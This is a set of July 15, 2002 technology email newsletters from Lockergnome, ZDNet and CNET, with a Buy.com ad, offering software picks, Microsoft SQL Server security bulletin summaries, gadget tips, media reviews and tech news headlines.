* * * * * * * * SPECIAL ADVERTISER ANNOUNCEMENT * * * * * * * *Â Â July 15, 2002
Free Shipping at Buy.com!*
pcAnywhere 10.5
List PriceÂ -Â $179.95
Buy.com priceÂ -Â $159.95
Plus an $80.00 mail-in upgrade rebate available from Symantec.more infoLinksys 11MbpsWireless PC Card
Buy.com priceÂ -Â $69.95
Share printers, files and more anywhere within your wireless LAN infrastructure; increasing your productivity and keeping you "in touch."more infoMouseMan Traveler Optical Mouse for Notebooks
List PriceÂ -Â $49.95
Buy.com priceÂ -Â $43.12
Travel anywhere with it. No ball. No cleaning. No hassle.more infoPanasonic DVD-LV50 PalmTheater? Portable DVD-Video Player with Built-in Freestyle LCD
List PriceÂ -Â $599.95
Buy.com priceÂ -Â $499.99
Panasonic's portable DVD players are equipped with built-in widescreen LCD monitors.more infoAcer TM632XCI NB P4
List PriceÂ -Â $2,077.19
Buy.com priceÂ -Â $2,031.95
Mobile experience to the next Level! Amazing value on this Acer Notebook!more info128MB SanDiskSmartMedia Card
List PriceÂ -Â $108.75
Buy.com priceÂ -Â $55.58
Removable SmartMedia Card that's great for the Road!Plus Free Shipping!more infoUS Robotics 56K Global GSM &amp; Cellular PC Card Modem
List PriceÂ -Â $119.99
Buy.com priceÂ -Â $69.95
Get connected on your notebook anywhere your GSM Cell phone works!more infoToshiba PocketPC e310
List PriceÂ -Â $402.84
Buy.com priceÂ -Â $359.95
Easy to use, the Toshiba Pocket PC e310 features a familiar user interface and tools powered by Microsoft Windows such as Pocket Word, Excel, Outlook &amp; Windows Media Player for Pocket PC 2002.more info						All prices and product availability subject to change without notice. Unless 
						noted, prices do not include shipping and applicable sales taxes. Product 
						quantities limited. List price refers to manufacturer's suggested retail 
						price and may be different than actual selling prices in your area. Please 
						visit us at www.buy.com or the 
						links above for more information including latest pricing, availability and 
						restrictions on each offer. "Buy.com" and "The Internet Superstore" are trademarks of 
						BUY.COM Inc. (C) BUY.COM Inc. 2002. All rights reserved. 						*FREE SHIPPING OFFER: Get FREE SHIPPING on qualified items for a limited 
						time only. Qualified items are identified on product information pages with 
						this free shipping icon. Standard ground shipping method will be selected by 
						Buy.com except for books, videos, DVDs, music and games, which will ship 
						via budget shipping method. Free shipping offer is limited to in stock 
						items. Restrictions apply. See site for details.
Sign up for more free newsletters from ZDNetThe e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.orgUnsubscribeÂ | 
        Â Manage 
        My SubscriptionsÂ |Â FAQÂ | 
        Â Advertise
Home |eBusiness | Security | Networking | Applications | Platforms | Hardware | Careers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</si>
  <si>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20020715 Lockergnome Tech SpecialistÂ  07.15.2002 GnomeREPORT 
Hackers and crackers respect only one thing: strong security. 
Keep the bad guys
out of your PC or network with the advanced technology that's trusted by millions: 
ZoneAlarm Pro 3.0. This best-in-class personal firewall stops hackers cold, defends
your online privacy,and sets up in minutes. 
Click here to download now!   As if there weren't enough hypocrisy and misinformation 
being spewed by marketing and sales departments. This time, 
a startling revelation that Microsoft refuses 
to use their own ISA Server to protect themselves from the 
very things the product is meant to stop - worms and 
intrusion. Nimda was turned loose within Microsoft and 
they've chosen NetScreen's 500 series security appliance to 
cure what ills them. I find this staggeringly hilarious, to 
say the least. The move is tantamount to Intel deploying 
desktops based on AMD processors!Ok, so a hardware solution might be better than a 
software defense in many cases. I suppose we can't entirely 
blame Microsoft for opting to go that route. Probably a wise 
decision, in fact - admit defeat and move on. However, why 
is Nimda spreading within the corporate walls to the point 
that they felt the needed to make such a leap in the first 
place? After all, patches were released months ago, so IIS 
is impervious to attack now. Still considering the 
deployment of IIS as your web server platform of choice? 
Things that make you go hmmmm...
See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Randy NielandÂ Â Â Â Â Â Â Â GnomeNETWORK
SQL Server Install Leaves Passwords Behind
http://www.microsoft.com/technet/security/bulletin/MS02-035.asp
During the installation of SQL Server 7.0 or 2000, 
various bits of configuration information are stored in a 
setup.iss file, including account passwords that have been 
captured in order to configure the services. Prior to 
certain service packs, these passwords are stored as clear 
text, which is problematic because the file is left on the 
hard drive after the installation process is completed. 
Peruse the details of the bulletin to be sure you've cleaned 
up any relevant bits and pieces applicable to your 
environment.
SQL Server Cumulative Patch
http://www.microsoft.com/technet/security/bulletin/MS02-034.asp
A new roll-up patch is available for SQL Server that takes 
care of all previous security issues, plus a trio of new 
items. Two buffer overrun vulnerabilities exist that could 
allow an attacker to gain control over the server, and a 
different privilege elevation flaw can be exploited due to 
improper permissions within the registry. All three are 
spackled over by the latest cumulative patch described 
further in this bulletin.
Â GnomeSYSTEM
Win2K Memory Allocation Adjustments
Unearthed by Wayne Clarkhttp://searchwin2000.techtarget.com/tip/0,289483,sid1_gci835208,00.html
Most Windows 2000 servers tune themselves fairly well and 
do not need further tweaking. In those cases, it's best to 
just leave things alone unless you specifically identify a 
problem somewhere. Serdar Yegulalp has an excellent 
explanation of one particular situation where memory pools 
can be exhausted and crash the server. Before you go diving 
into the registry to play with the knobs and buttons, be 
certain you know what you're messing with or you could just 
make things worse. Backups, backups, backups.
Â GnomeALERTZ
Today's Top 5 kbAlertzQ325582 - FIX: Output Data Overwritten When Input Data Is Larger than Destination Field (Q325582)
Q305356 - Windows XP Prompts You to Re-activate After You Restore Your Computer (Q305356)
Q304622 - CAPS LOCK Key Behavior with 16-Bit VDM Is Incorrect for French MultiLanguage Versions of Windows (Q304622)
Q235063 - Error C00D0035 Using Windows Media Player (Q235063)
Q277843 - FIX: Restore of Log in Standby Mode May Cause 9004 Error Message if the Original Database has Shrink Enabled (Q277843)GET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Recommend It!
Â GnomeASSISTANT
Sorting IP Addresses Via Script
http://www.i386.com/Default.asp?page=docs/scripting-ip2long.htm&amp;category=admin&amp;id=1046
Documentation is everything. If you have a handle on your 
network configuration, it's much easier to manage. IP 
addresses are one bit of information that must be properly 
tracked, but often it's a manual effort to enter and sort 
data. Using the script techniques provided in this brief 
article, you can convert an address to a 32-bit number, 
perform the sort, then convert back to the standard dotted 
decimal format. An Excel sample spreadsheet is also provided 
to get you started.
Â GnomeSTUFF
Broadband Sharing Crackdown
http://news.com.com/2100-1033-942323.html
Those of us with wireless networking equipment might be 
tempted to allow the neighbors to share the wealth, but be 
careful. Broadband companies are catching on and putting a 
stop to the practice. What's concerning to me is that I 
don't share my wireless network, but I do use quite a few 
different machines at any given time. If someone is snooping 
around and seeing a lot of different sessions and gets 
curious, might I be subject to a teeth-kicking?Virtual Sketching
Discovered by Dianahttp://members.bellatlantic.net/~vze2mfh8/
I believe I still have an old Etch-A-Sketch in a box 
somewhere. Maybe I should dig it back out and webify the 
thing just for grins. Check out this example of novelty web 
programming, assuming y'all don't kill the site. If it's 
down, check back later. Using a web form, you can enter the 
moves you'd like to see represented on the pad, which is 
viewed through a live webcam. I'd love to see someone craft 
the Lockergnome logo. Impress me...
Recommend It!http://www.lockergnome.com/issues/techspecialist/20020715.html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</si>
  <si>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20020715 Lockergnome Windows Daily
Â  07.15.2002 GnomeREPORT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It's official: Gretchen, Sprocket, and I will be moving in a few
weeks. Not too far, though. We'll be going deeper into the city of
San Francisco starting on the first of September. Lori and Norm
were here over the weekend (for a photo shoot); in between sets,
Gretchen invited them to join her hunt. They came upon a house
located in one of the busier parts of town. With only street
parking available, I wasn't too thrilled about investigating the
property. However, my wife seemed optimistic. We kinda knew what
we were looking for in a residence (and its neighborhood), but
also knew we'd have to make certain concessions in the process. We
parked (literally) up the hill and found our way to what would
turn out to be our future home (at least, for the next year or
so). It has lots of usable space - which is a premium here. Plus,
the landlords are extremely dog-friendly. Winner! The pictures and
videos will come, never fear.PC World Picks
WinZip v8.1
IrfanView v3.70
ACDSee v4.0.2
Microangelo v5.5
SmartDraw
Winamp v2.80
Paint Shop Pro
Cool Edit 2000
UltraEdit v9.00a
Backup Plus v6.1.1
TextPad v4.5
Mailbag Asst v2.6c
Time and Chaos v5.4.0
SureThing Labeler
WinRAR v3.00
Blaze Media ProFirst order of business: get broadband! According to AT&amp;T's Web
site, cable modem service is not available in the area. However,
DSL is an option. So, it looks like I'm going to be purchasing an
external DSL
modem in a few days. Any suggestions?
Yeah, I'm not even sure who I'll select for my provider. They
currently use SBC to get online, so I might just stick with them
for continuity's sake. Verizon has been solid enough for me here,
but I believe our loft complex has a unique infrastructure. If I
could make contact with someone from any capable system, I'd
probably go with them. I should probably get the ball rolling
soon, though - I'd hate to play the waiting game for too long.
I've heard of installation nightmares, so I'll probably be rolling
my own (again). 56k is quaint, but hardly enough pipe to get any
real work done. When you download as much as I do, every bit
counts. Oh, and did I tell you about the bites?
There are plenty of unique restaurants in just about every
direction. Plus, we're right up around the corner from a Peet's
outlet! If you need me, you know where you can find me. I'll
probably also be setting up a Wi-Fi network before too long, too.
My Proxim hardware still works, but I wasn't sure if I needed a
crossover cable to connect it to my router. Furo tells me: "If the
hub has an uplink port, then a straight cable should work between
the two, as it provides the crossover for you. If both have uplink
and non-uplink ports (workstation attachment ports), then you
would need a crossover cable between like ports. For instance, if
you were connecting a workstation port on one to a workstation
port on another, you'd have to use a crossover. Same for uplink to
uplink." How's that for home network helpfulness? Oh, if only he'd
do a free Gnometome for
us...See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Chris PirilloÂ Â Â Â Â Â Â 
Â GnomeDOWNLOADS
Traces Viewer v1.0 [478k] W9x/2k/XP FREEhttp://www.surfpilot.net/tracesviewer.html
{Find Web site remnants} Who knows what evils lurk on the hard
drives of mine? I'm always curious about what has been downloaded
to my PC after I have visited a website. I suppose I COULD clear
out my Temporary Internet Files before going to every single
page... or I could just install Traces Viewer. This handy
application gives me the power to see what my PC acquires for
every website I visit. With Traces Viewer's easy-to-read
interface, I can see what files come from each site, and also if
the site contained any cookies.  Mmmmmm, cookies... now, how could
chocolate chip be evil?
Pixel Toolbox v1.1 [3.7M] W9x/2k/XP FREEhttp://www.axiomx.com/PixelToolbox/
{Make your own icons} I have a compulsive habit of changing the
original desktop and icons in Windows to a version that mirrors my
personality. So what happens if I can't find a desktop or set of
icons that suits me? I load up Pixel Toolbox! This program allows
me to flex my creative skills by creating Windows icons and
pointers. Find yourself in a creativity slump? Well, you don't
have to strain your creative muscle. PixelToolbox allows you to
import an image that you already own, and work from there. If that
isn't enough, you can fashion your own tiled desktop or share your
creation with friends by exporting your masterpiece as a .jpg,
.png, .tga, or .tif file.Recommend It!
Â GnomeCLICKS
Â GnomeSYSTEM
Software Audit Protection Program [2.9M] W9x/2k/XP FREEhttp://www.alliedhr.com/sapp.htm
You NEVER pirate software, right? OF COURSE YOU DON'T! (Good
answer.) So, if someone came to your door and accused you of
software piracy, could you prove them wrong? With the Software
Audit Protection Program (SAPP), you could. You can track every
piece of software you own with this application; you can attach an
image of your paper receipt, add information like serial numbers
and activation keys, etc., so you will never be left hunting for
these items in the future. SAPP can even create and print reports
detailing your inventory. If you own a small company and want to
make confirm that you and your employees are "Software Compliant,"
this is the program for you. You can track your software using
many different variables such as License, User ID, Software Title
or Activation Key. Don't get caught second-guessing... be certain
with the Software Audit Protection Program!
Recommend It!
Â GnomeWILDCARD
Print! v1.6 [319k] W9x/2k/XP US$39
    Unearthed by Rob Mullerhttp://www.robsoftware.com/
{Screen print utility} Time is money, and I endorse any program
that can save me time. Luckily, that is exactly what Print! v1.6
does. Say that I want to share screenshots with my other tech
friends to compare error messages and talk about possible fixes:
every time I take a screen shot, I open up Word, paste the
snapshot, and THEN I can print it. Too many steps, too much of my
time! With Print!, I just hit my "Print Screen" key and out comes
my screenshot without involving any other programs. Don't want a
screenshot of your whole desktop? Not a problem, just press Alt +
Print Screen and you'll have a printout of the active window only.
Print! 1.6 goes so far as to put the date and time on your
printout too... perfect for saving those high scores on solitaire!
Other features include scaling, centering, and the ability to
invert images. (So, not only will you save time, you'll also save
on toner. Bonus!)  You may also want to note that Print! saves
your printer configuration without wreaking havoc on the settings
in your other programs. You'll definitely get your money's worth
with this program. Don't believe me? Start by checking out the
evaluation version for yourself!Submit Your Thoughts | Recommend It!
Â GnomeFAVORITEREMOTE ACCESS TO YOUR E-MAIL: LoudPC is a new product from Loudfire enabling direct access to your PC's Outlook(tm) from any Internet browser or web phone. Use LoudPC to access your work email from home, check your next appointment while at lunch, reply to an important email while in a meeting, etc. No synchronization required. Works with your existing email accounts. Accesses all of your folders. All changes reflected immediately in your Outlook(tm). Get more info on LoudPC BookCrossing Bookclubhttp://bookcrossing.com/
Gretchen is a self-professed pack rat: there are just some things
that she can't throw away. For example, books. I, on the other
hand, prefer my text in an electronic medium, and don't really
miss those analog versions. (What's that stuff called again?
Paper?) Many of my books are gathering dust on the bookshelf. The
alternative? Free them into the wild! BookCrossing is essentially
a worldwide book club. You register online and get a BookCrossing
ID number to put on your books with a note sending the new reader
back to BookCrossing (think of wheresgeorge.com). Then you just
leave the book "in the wild" to be found by someone else; the
folks at BookCrossing suggest a park bench, the pocket of an
airplane seat, or just plain giving your book to a friend. "Sounds
easy, right? Well it is. It's also a fascinating exercise in fate,
karma, or whatever you want to call the chain of events that can
occur between two or more lives and one piece of literature. Oh,
and we should mention, it's absolutely free and absolutely
private, too." BookCrossing also offers book reviews, ratings, and
recommendations.Recommend It!
Â GnomeTIPAny modem that relies on Windows to function is dubbed a
"Winmodem." Most manufacturers use "Winmodems" because they are
cheap and easy to set up on a standard model PC. I don't have any
problem with the manufacturer saving money (because living in a
capitalistic society, I would hope that the savings would trickle
down to ME in one way or another). I do, however, have a problem
with the way "Winmodems" function after you add more internal
devices to your PC. "Winmodems" rely on Windows to mediate their
serial communication (I/O address, COM port, IRQ, etc.) and as you
can imagine, the more devices Windows has to manage, the higher
the probability of running into a problem. And what if you want to
run Linux instead? Will the "Winmodem" function well, if at all,
in an operating system other than Windows? Don't bet on it! If you
want to make sure you don't have any problems after upgrading your
system, you'll want to get yourself a hardware modem. How can you
determine this? Checking a modem's system requirements. If the
modem says it REQUIRES Windows, then keep looking... you've found
yourself a "Winmodem." However, if the system requirements for the
modem say that it will work with Linux, then you've found yourself
a hardware modem. Yes, it IS that easy.Recommend It!http://www.lockergnome.com/issues/daily/20020715.html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how Sprocket thinks he has a right to eat pumpkin seeds. Or, would that be "pupkin" seeds?Not for the Puppy
Â 
CLICK HERE TO ZOOMÂ Â 
BYTE ME NOWÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.Toys are made in heaven, batteries are made in hell.</t>
  </si>
  <si>
    <t xml:space="preserve">
ZDNet AnchorDesk Daily NewsletterNeed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MON JUL 15, 2002Â David CourseyDear Steve Jobs: At Macworld, show me this...
                I'm headed to NYC for Macworld Expo. Steve Jobs usually makes big announcements at these shows--last time around it was those cool new iMacs. I don't know what he's got up his sleeve this time, but here's what I'm hoping for.
NOTE: Why we're changing our publishing schedule 
PLUS: AnchorDesk Radio: From Apple's Jaguar to Ed McMahon Tech bids for security money... Fridge viruses... USA Today hacked 
The many ways YOU'D change Microsoft Office 
Wanna combo PDA/cell phone? Here's what to look for
How to defrag your hard drive--and speed up your PC  yCrucial Clicks: More from ZDNet           PDAS    An industry firstZDNet reviewers take a look at Toshiba's e740, the first PDA with Intel's new XScale processor and integrated Wi-Fi connectivity.  Read our Full Review      yMost Popular Products    Handhelds 1. Toshiba Pocket PC e310 2. Toshiba Pocket PC e740 3. Palm m515 4. Palm Vx 5. Compaq iPaq H3835 More popular PDAs             Â SYLVIA CARRÂ Tech bids for security money... Fridge viruses... USA Today hackedTech companies long for a piece of the billion-dollar government IT budget. Plus: Computer viruses may infect your fridge one day soon. And USA Today's Web site is the latest victim of a hack attack. 
 Â DAVID MORGENSTERNÂ The many ways YOU'D change Microsoft OfficeDavid Coursey recently presented his top ten wishes for how Microsoft could improve the next version of Office. Turns out you have your own suggestions for making the office suite better, too. David presents your ideas. QuickPoll results: Which office suite do you use? Â DAVID BERLINDÂ 
Wanna combo PDA/cell phone? Here's what to look for
                With all the new gadgets out there merging PDAs with cell phones, choosing the right device is harder than ever. Before you lay down your cash, let David explain which features really matter, from Bluetooth to thumbboards.
Â PRESTON GRALLAÂ 
How to defrag your hard drive--and speed up your PC
                Looking for a quick way to rev up your sluggish system? Try defragmenting your hard drive. Since the Windows defrag tool is less than ideal, Preston shows you three downloads that do a better job of it.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</si>
  <si>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Tech Update Today
VITAL SIGNS FOR JULY 15, 2002Dan Farber
Unplugged: FBI CIO Darwin John
In the twilight of his career, an IT veteran takes on the formidable task of transforming the FBI's antiquated technology infrastructure. He's being sworn in today.
Read my interview with Darwin JohnLatest from ZDNet News
Yopy brings Linux to wider audience
Activists to ISPs: Don't be a stoolpigeon
New Athlon to launch in stormy seasWireless companies ripe for consolidation
W3C boosts Web services languageCisco hooks up airport 'hot spots'
Palm, Handspring win patent spatMore Enterprise News
David's PicksDanFarberIT sees new profits in Old Glory
Can CRM be tweaked to track terrorists? As the fight against terrorism heats up, the government turns to the tech industry to come up with tools to secure the country against attack. It's an opportunity for patriotism--and for profits. (Nearly $38 billion is slated for homeland security.) Software companies  are sending tens of thousands of proposals to government agencies, some of which are so new they don't have the budget to hire people to evaluate them all.Read more the ZDNet News Focus
Are Spam blocklists going too far?Many businesses are turning to spam-filtering tools to regain
control of their e-mail boxes. But legitimate e-mails are being 
deleted, too, now that sometimes-indiscriminate blacklists have
become a key weapon in the war against unsolicited bulk e-mail.
 Companies
subscribe to the lists, bouncing any traffic directed to their
servers that originates from those addresses. Is overkill the
answer to stopping spam? What is your company doing to stop
junk e-mail?
Read the full story
Attacks are on the riseNo, you're not paranoid. Wayne Rash warns that the number of
attacks on Internet-connected networks is increasing, with no 
sign of letting up. Here's what you can do to protect your
business against malicious attacks.
Read the full story
Gartner unfolds Sun's server roadmap
Sun's midframe and high-end servers will see only evolutionary
change through 2006--faster processors, support for PCI-X I/O, 
and InfiniBand, according to Gartner. More significant
developments will come through software, with moves toward
providing public utility-style availability and capacity. But Gartner
adds note of caution concerning Sun's credibility.
Read the full story
'My favorite PDA is the Nokia 9290'Tired of carrying around both PDA and phone, reader John Maravilla says he spent a year "looking for a decent integrated PDA/phone" before finding the Nokia 9290. Then he read my "What to look for in your next PDA/phone" and wrote to reassure me that I'm not crazy for liking a PDA  resembling a cell phone from the Reagan era.Read his full letter
"What to look for in your next PDA/phone"
A hulk of a systemHow much does a cutting-edge PC cost these days? Plenty--but Sys Performance 2533 delivers a lot in return. It's packed to the rafters with high-end components, and boasts the highest office-productivity score ZDNet reviewers have seen.Read the full reviewWrite me at david.berlind@cnet.com
Back to topAlso on Tech Update Today
COMMENTARYÂ Next MS Office? Here's what to add--and deleteThe next version of Microsoft Office is due in the next year or so. If you were product manager for the industry-standard office suite, what would you add? What would you get rid of? What would you fix? Here's David Coursey's wish-list.
 Q&amp;AÂ We can handle CEO cheats
Phil Bond, the U.S. undersecretary of commerce for technology, explains why the financial industry can ride out the current 
storm without major government intervention.
 PREVIOUSLY ON TECH UPDATE TODAYÂ Oracle issues a new challenge to Microsoft
Oracle's new Collaboration Suite includes e-mail, calendar and messaging software and is less expensive than Microsoft's offerings, says Oracle CEO Larry Ellison. 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</si>
  <si>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20020715 Lockergnome Digital Media
Â 07.15.2002 MediaREPORT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To all you Dream Theater fans out there, please accept my humblest of apologies. 
I mistakenly announced their break up in the last GnomeAudio section, causing 
quite a stir among a number of subscribers. In fact, they just released a double 
album this year and have been touring in support of that release. 
For today's false alarm, please make note of the tragedy that is the N'SYNC 
breakup (oh wait, that's just wishful thinking).I know I've already carried on about my Kyocera 6035 phone, but this thing is 
awesome.  I've got all my contacts in one device. Web browsing is good - I'm 
sure it would be better on a color screen, like the 
Treo 270, but for what I'll need, 
this works well. I'm currently looking for an ssh client I can install, so that 
remote server logins will be possible. My one complaint is the base station's 
use of a serial connector instead of USB, but I suppose they were cutting costs. I'm also scoping out the 
Palm Markup Language 
(PML) standard for marking up Palm Docs, 
in an effort to make the GnomeTomes a little flashier. I've installed several of 
the files on my phone and while they are easy to read, have all the content 
organized, and function as useful tips for the various subjects, I'd like to add 
some minor tweaks to future tomes, so that they look even better for me and 
anyone else who reads them on their Palm.  
Jake LudingtonÂ Â Â Â Â Â Â Â Â GnomePRODUCER
TomeRaider v2.0 [1673k] W98/W2K/Pocket PC/Palm $25
http://www.tomeraider.com/
Of the formats Lockergnome uses for our GnomeTomes, TomeRaider is by far my 
favorite. Designed with a feel similar to CHM, the TR format is quite easy 
to read, as it places section titles in a pane separate from content, 
allowing you, the reader, to navigate through our tips (or anything else) 
with much greater ease than the linear format the other versions present. 
The Windows version of the software is truly designed with ease of use in 
mind. Creating ebooks for TomeRaider is a simple matter of combining a 
modified set of HTML tags with the  designation for page breaks. The 
only trick for Yankees like me is remembering that center is tagged centre 
in the software.Â GnomeFEATURE
The Herd of Star Wars Nerds
http://www.ifilm.com/ifilm/product/film_info/0,3699,2439321,00.html?cch=11
Triumph the dog is low-tech, he's not cute like the pets.com sock puppet, 
but he manages to maintain a twisted appeal to fans of lowbrow comedy. In 
this segment, Triumph makes a mockery of geeks standing in line for 
Episode II. Whether you've been one of those geeks yourself, or you've 
never understood why anyone would dress up and wait in line for a movie, 
you'll still find this film amusing. 10 minutes was more than necessary 
to get the point across, yet Triumph delivers enough one-liners 
throughout to keep you watching all the way to the end.
 Â GnomeSKIN
Kids World for DesktopX by FrogboyPosted on 7/14/2002 12:35:00 AM  -- Â Â  [Download]
Â --Â [Zoom]
Â --Â [Visit WinCustomize]Â GnomeAUDIO
Heleen van den Hombergh
http://www.heleenvandenhombergh.com/
http://artists.mp3s.com/artists/378/heleen_van_den_hombergh.html
Classic jazz vocal styling, juxtaposing arrangements of contemporary 
pieces with arrangements of jazz standards. Combined with some 
beautiful piano arrangements, Heleen's voice is a thing of beauty. A 
Netherlands native,  who originally dreamed of saving the rainforests 
(at least according to her biography), her interpretation of American 
jazz standards and show tunes is more remarkable than most native 
English speaking vocalists. No world tour is currently scheduled, so 
you'll probably have to journey to Europe to see her in person, but 
for those of you living elsewhere in the world, the Internet makes a 
fabulous venue for experiencing Heleen  van den Hombergh's talent. A BOOK FOR EVERY GEEK: Want to know more about 
networking? 
Have you ever wanted to 
write an e-book? Maybe you need to polish 
your 
Web design skills? Get full-length books from the Poor Richard's 
series, including Poor Richard's E-mail Publishing, by Chris Pirillo, at GnomeTomes.com, for 50% off the suggested retail price of the print versions. 
Click here to learn more.    
Â GnomePLUGIN
Aezay Caption Draw v1.0 [71k] W9X/NT/W2K/XP FREE
http://www.winamp.com/plugins/detail.jhtml?componentId=112660Reminding me of creating captions for Webcam32, this application uses 
incomprehensible string values to display relevant info about Winamp 
songs in the Windows caption bar. List song names, time of day, 
playlist information, filenames, and a variety of other more obscure 
information. Changing caption colors is also doable within this 
plug-in. A set of hot keys makes controlling Winamp from your keyboard 
more functional, although you can't remap any of the keys.
Â GnomeDVD
Click for DetailsThe Man Who Wasn't There (R) 2001
Drama - 116min
Reviewer's Tilt (9)Special DVD Features worth a look-Thornton and Coen Brothers CommentaryMuch more film noir, than a movie trying to imitate film noir, The Man
Who Wasn't There captures the inevitable hopelessness of the genre. Ed
Crane (Billy Bob Thornton) is the archetype everyman. A barber by trade,
Crane represents the individual in society. He hears everything, but
truly knows nothing. Everything he hears is modified ever so slightly by
the retelling. He gets neither the whole story nor the true motivations.
Left to guess at the motivations and desires of those around him, Crane
develops an indifference to it all. When a snake oil sales man slithers
into town, Crane takes this opportunity to cheat the cheaters and punish
the punishers.  As indifferent as Crane appears, he is no match for the
amorality of fate. As much as fate is indifferent in its wrath, however,
so is it artistic in its execution. That is what makes our lives so
entertaining. Fate doles ultimate justice, but never as expected. The
Man Who Wasn't There is truly a Kafkaesque tale of an individual's year
to turn against the tide of inevitability. Atypical of cuter, more
recent Coen brothers fare, this film is reminiscent of their earlier
noir works like Blood Simple and Miller's Crossing. Frances McDormand
does an outstanding job making as Crane's selfish wife and James
Gandolfini exudes boorishness as Doris' boss. The real outstanding
performances, however, rest with the supporting cast. Tony Shalhoub, as
pompus attorney Freddy Riedenschneider and  Jon Polito as the snake oil
salesman impress and entertain as cruel, but offbeat parodies of their
characters. The black and white cinematography by Roger Deakins also
impresses and precisely underscores the bleakness of Crane's life and
the monochromatic nature of fate. 
Region 1 Encoding (US and Canada only)
Format: B&amp;W, Widescreen Anamorphic, Closed Captioned
Sound: Dolby Digital 5.1, Dolby Digital 2.0 Surround Spanish, Dolby Digital 2.0 Surround French
Billy Bob Thornton, Joel Coen and Ethan Coen Commentary
Deleted Scenes
Making-of Featurette
Interview with Director of Photography Roger Deakins
Photo Gallery
TrailersReview by Brett TroutÂ GnomeWALLPAPER
Isolation for Photo Manipulation by fake[x]Posted on  7/14/02 11:08PM  -- Â Â  
[Download]Â --Â [Zoom]
Â --Â [Visit DeskMod]
http://www.lockergnome.com/issues/digitalmedia/20020715.html
Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org] - To unsubscribe or change your delivery address, please visit the subscription management page. For further information, please refer to the GnomeCREDITS in the sidebar.
LOCKERGNOME
Â Geekathon 2002Â Latest Windows Daily
Â Latest Digital Media
Â Latest Tech Specialist
Â Latest Penguin Shell
Â Latest Apple Core
Â Latest Web Weekly
Â Latest Bits &amp; Bytes
Â Latest Audio ShowÂ The GnomeSHOPPERÂ Microsoft Office Tips
Â PC Productivity Tips
Â Cool Internet Tips
Â Windows 2000 Tips
Â Windows XP Tips
Â Top 50 Fun Sites
Â Must-Know Tech Terms
Â Top 50 Useful Sites
Â Top 75 Tech Sites
Â Top 50 PenguinCORE
Â Top 50 PenguinTWEAKS
Â Recommend Us!
Â Advertise With Us
Â High-Tech Job Search
Â Chat With Gnomies
Â Watch The Webcams
Â Computer Power UserÂ Submit Your Opinion
Â Read Past Issues
Â Download X-Setup
Â About Lockergnome
Â Our Privacy Policy
Â View More Options
Â Get Chris's BookÂ General Feedback
Â E-mail the Editor
Â Jake's BlogÂ Our XML / RSS Feed
Â Syndicate Our Tips
Â Link To LockergnomeCLICK HERE TO ZOOMÂ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GNOMEMUSICGoo Goo Goes DisneyThe Goo Goo Dolls have had some of their most successful songs come out of movies, so it's not a big leap to see...
Lenny Paints Town PinkLenny Kravitz and Pink are gearing up to hit the road. The U.S. leg of Lenny Live kicks off today in Virginia Beach...
Up On the RoofOh, the difference a preposition makes. Dave Matthews Band will launch their new album, Busted Stuff, on the Ed...
Bow Wow Wants to Bark-Play-For DukeThe rapper formerly known as Lil (he's dropped the Lil) Bow Wow says he's like to play basketball in college and...
Whitney's New Song LeakedWhitney Houston needs a hit and she's hoping "Whatcha Lookin' At" is it. The song was leaked over New York radio...
Fat Joe in Bar FightRapper Fat Joe - real name Joseph Cartagena - is charged with breaking a man's jaw during a bar fight in B.B. King's... 
Â 
GNOMECREDITSÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.
Â Â Search Past Issues:
Â </t>
  </si>
  <si>
    <t xml:space="preserve">File-traders in the crosshairsÂ Search
	                Â 
	                Â 
News.com
	                All CNETÂ Â Â Â 
	                The Web
                Â Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 15, 2002File-traders in the crosshairsWill IBM's new "Shark" sink or swim?HP exits e-business software marketSecurity's the message for ExchangeHack attacks on Linux on the riseMicrosoft tries to steal Macworld thunderÂ PerspectivesSend in the geeks
Declan McCullagh tells of technophiles who become political activists.
Read Full Story
File-traders in the crosshairsWhen the recording industry last month let slip plans to sue individuals who trade copyrighted songs on file-swapping services, Web surfers everywhere pulled down their MP3 collections in a frenzy of fear.
OK, not really. Despite the music industry's hopes, such threats have so far been met with a collective yawn in the file-swapping community, which has yet to see much damage in spite of repeated legal wrangling with the Recording Industry Association of America.
July 15, 2002, 10:00 AM PT
 | Read Full Story Will IBM's new "Shark" sink or swim?IBM announced a new top-end "Shark" storage system Monday that could boost the company's prospects against entrenched competitors in the depressed storage market.
Three years ago, IBM introduced its first Enterprise Storage System product, code-named Shark, in an attempt to rebuild a market it had almost totally ceded to rivals EMC and Hitachi Data Systems.
July 15, 2002, 7:30 AM PT
 | Read Full Story HP exits e-business software marketHewlett-Packard on Monday discontinued its family of e-business software after failing to make a splash in the multibillion-dollar market.
After a two-year effort, HP decided to discontinue its NetAction product line, which included application-server software designed for Web transactions, and related software for building Web services, technology that allows companies to interact and conduct business via the Internet.
July 15, 2002, 10:55 AM PT | Read Full Story 
Security's the message for ExchangeMicrosoft is hatching plans for a new Exchange Server e-mail system, with improved security, a facelift for Outlook, and better support for cell phones and other handhelds.
Microsoft chief executive Steve Ballmer is expected to elaborate on the new version of Exchange in a speech to business partners Monday at its Fusion conference in Los Angeles.
July 15, 2002, 11:30 AM PT
 | Read Full Story Hack attacks on Linux on the riseHackers are increasingly targeting Web servers based on the Linux operating system, while the number of successful attacks on Windows systems decreases, according to a new report from a U.K. systems integrator.
The study by Mi2g also found that successful attacks on U.K. and U.S. government sites have decreased, which may be due to tougher laws and improved security.
July 15, 2002, 11:20 AM PT
 | Read Full Story Microsoft tries to steal Macworld thunderMicrosoft on Monday launched the first of several pre-emptive strikes against Apple Computer's Macworld trade show by making announcements about new technologies far ahead of their delivery to market.
The strategic attack comes as tensions mount between Apple and Microsoft. During Macworld five years ago, the two companies announced a five-year technology agreement, whereby Microsoft committed to continued development of Office and Internet Explorer for the Mac.
July 15, 2002, 8:00 AM PT
 | Read Full Story 
From our partners:Chewing the sashimi with Jeff BezosBusiness Week
"We're still at the very beginning," says Amazon.com's founder in a wide-ranging interview over lunch. "There's so much more to come."
July 15, 2002
 | Read Full Story The earnings season of discontent Business Week
